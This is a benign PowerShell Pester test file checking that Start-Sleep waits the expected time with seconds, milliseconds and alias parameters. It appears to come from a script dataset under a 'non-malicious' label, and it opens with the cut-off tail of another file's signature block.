aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCOHPtgVdz9EW0iPNL/BXqJoqVMf6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smOGTAi # GA8yMDI0MTAyODA0MTQxN1oYDzIwMjQxMDI5MDQxNDE3WjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyY4ZAgEAMAcCAQACAhoOMAcCAQACAhQzMAoCBQDqyt+ZAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAILIYM82Dr6OQATDiRWNUyg2wRlm # EUSqsB1JFEW74Yh1oAnUZKTsyjkj69LBZadyOOGYRONFXVrLg2UzYpOybudC6apW # F7OLJj+IzfERluG9wFcnKZ9nQJX9wRpYQTjI+HOGDzbNDtv/AZsljeI3E8vdDX2J # A5g0hP9oaR70WD/wOq0PR+x3mN5f1zd+9DKLNdoZln/PAUaAifsQHFa1V2SlrA1v # NThkBK0cQg8uhyBgCm7AsGaKUPGTfqjRwamualhSXVVcTqzB0lgWaEJSYXahgaHS # lmMTGuAFMVHbFFtVtBr3X8aXaLyVh40TpbLQLBYIg/b1tbXcNuF8uOw+/uIxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAezg # K6SC0JFSgAABAAAB7DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCBbvxIdC/+32Pqdc4zIu6pFE2Hv # Utkn76raPWgKs7aRjTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICcJ5vVq # fTfIhx21QBBbKyo/xciQIXaoMWULejAE1QqDMIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHs4CukgtCRUoAAAQAAAewwIgQgsLR3G5Tm # SmMHedwiqAcbeNSpfnbye1U8J5bYVqFB6MwwDQYJKoZIhvcNAQELBQAEggIAnaHa # s1QDrNzGMuHG4KXSeUDUxx9wnpe2pGIe0AOZgodBVv/tln0sdxuE/ktliSo1xHHM # nmlMNsg7MgLcCNhZEVvpSexGYk8q2pqFEi+/hcMu1mDwCh2vyNg2pc5QeZ3+RXLr # yogicIfk7CRiI9qK5rp1fWm9tVP+88d0bdG6eEf4r5N5kimMTIKTuUe7Lhi+sLF+ # TLn3FB7ZzOJCBMC1O6+PVUDK1amskIYxzbvk6LerRjdT193nRZ5ToW2oHrXQ9FTA # BNZECwXp9uJXgs1OPdF04Aa56pr3viTqOid/05beTL5JxBKGVYM3Y7gxiemMdYcz # NToIvzhoP1BPVTe2nqtLQQ0FV18AVG0tpJVp0gyFwnMeXHdgbsCL16MoCHMBhx9I # FXtGLxgH6lIQ6r1sisOkF5gyQhyOALYGiZXkNcB2XQc7sPT/lsTzYJpLdnMwYBqp # Jjsjo0+2ALs+We5A5FC/1+VYVio81PatLCg+dBmAGH4klmrmo5wB19EIlXBkrMBN # 9HNnjzG5UHGBqU2xolHDRpEE0KYzNFTzrwSn5wF6tyoadbzSIsqQB27SXkhyfHtO # Q5KjwpR+K3qoa8/AYUWvzy+ZG1FT5yQKjBKexzGyEfwiD80g/Jq0rQr9eEugIUDD # 7JjePqkzxdFX8fCp2PiQTPfpCvYfNvPNJ0uo2io= # SIG # End signature block
combined_dataset/train/non-malicious/1921.ps1
1921.ps1
Describe "Start-Sleep DRT Unit Tests" -Tags "CI" { $minTime = 1450 $maxTime = 1700 It "Should work properly when sleeping with Second" { $watch = [System.Diagnostics.Stopwatch]::StartNew() Start-Sleep -Seconds 1.5 $watch.Stop() $watch.ElapsedMilliseconds | Should -BeGreaterThan $minTime $watch.ElapsedMilliseconds | Should -BeLessThan $maxTime } It "Should work properly when sleeping with Milliseconds" { $watch = [System.Diagnostics.Stopwatch]::StartNew() Start-Sleep -Milliseconds 1500 $watch.Stop() $watch.ElapsedMilliseconds | Should -BeGreaterThan $minTime $watch.ElapsedMilliseconds | Should -BeLessThan $maxTime } It "Should work properly when sleeping with ms alias" { $watch = [System.Diagnostics.Stopwatch]::StartNew() Start-Sleep -ms 1500 $watch.Stop() $watch.ElapsedMilliseconds | Should -BeGreaterThan $minTime $watch.ElapsedMilliseconds | Should -BeLessThan $maxTime } It "Should work properly when sleeping without parameters" { $watch = [System.Diagnostics.Stopwatch]::StartNew() Start-Sleep 1.5 $watch.Stop() $watch.ElapsedMilliseconds | Should -BeGreaterThan $minTime $watch.ElapsedMilliseconds | Should -BeLessThan $maxTime } } Describe "Start-Sleep" -Tags "CI" { Context "Validate Start-Sleep works properly" { It "Should only sleep for at least 1 second" { $result = Measure-Command { Start-Sleep -s 1 } $result.TotalSeconds | Should -BeGreaterThan 0.25 } } }